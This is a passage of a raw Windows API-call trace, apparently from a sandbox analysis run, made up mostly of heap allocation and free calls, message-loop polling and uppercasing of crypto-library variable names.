PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0214.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0214.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0214.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0214.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0214.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0214.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0214.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0214.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0214.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0214.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0214.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0214.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0214.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0214.920] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0214.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0214.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0214.921] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0214.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0214.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0214.921] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0214.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0214.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0214.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0214.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0214.921] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0214.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0214.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0214.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0214.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0214.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0214.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0214.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0214.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0214.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0214.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0214.922] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0214.922] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0214.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0214.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0214.922] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0214.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0214.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0214.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0214.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0214.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0214.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0214.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0214.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0214.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0214.923] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0214.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0214.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0214.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0214.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0214.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0214.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0214.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0214.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0214.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0214.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0214.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0214.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0214.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0214.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0214.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0214.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0214.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0214.944] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0214.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0214.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0214.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0214.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0214.944] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0214.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0214.944] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0214.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0214.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0214.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0214.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0214.945] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0214.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0214.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0214.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0214.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0214.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0214.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0214.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0214.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0214.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0214.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0214.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0214.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0214.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0214.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0214.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0214.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0214.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0214.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0214.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0214.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0214.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0214.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0214.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0214.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0214.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0214.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0214.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0214.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0214.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0214.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0214.948] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0214.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0214.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0214.948] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0214.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0214.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0214.948] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0214.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0214.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0214.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0214.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0214.948] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0214.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0214.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0214.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0214.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0214.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0214.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0214.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0214.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0214.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0214.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0214.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0214.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0214.949] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0214.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0214.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0214.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0214.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0214.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0214.949] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0214.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0214.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0214.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0214.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0214.949] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0214.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0214.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0214.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0214.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0214.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0214.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0214.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0214.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0214.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0214.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0214.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0214.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0214.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0214.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0214.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0214.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0214.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0214.950] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0214.950] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0214.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0214.951] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0214.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0214.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0214.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0214.951] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0214.951] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0214.951] HeapFree 